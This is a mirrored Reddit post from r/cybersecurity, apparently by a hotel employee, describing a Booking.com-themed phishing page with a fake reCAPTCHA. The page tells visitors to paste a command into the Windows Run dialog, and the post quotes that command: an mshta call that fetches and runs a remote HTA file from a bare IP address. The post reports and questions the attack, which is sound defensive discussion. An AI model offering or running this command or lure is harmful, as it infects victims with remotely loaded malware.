this post was submitted on 19 Nov 2024
1 points (100.0% liked)

cybersecurity

10 readers
1 users here now

This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.

founded 1 year ago
MODERATORS
 
The original post: /r/cybersecurity by /u/wound_dear on 2024-11-19 14:15:22.

My hotel email recently got an interesting phishing attempt. It contained a link spoofed to look like a genuine Booking.com link. When loading the site, a fake reCaptcha box loads with instructions to open the Run program on Windows, hit CTRL+V, and hit enter. The clipboard is loaded with this command:

mshta http://185.147.124.40/Capcha.html # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3781''

I thought this was an interesting attack. The real interesting thing, though, is the script loaded in on the IP's "Capcha.html" file, which I've put in an (unlisted) pastebin here.

I can recognize this is obfuscated code, but I have no idea how to crack this any further. Also, I feel like having an unshielded IP address is kind of a liability, no?

no comments (yet)
sorted by: hot top controversial new old
there doesn't seem to be anything here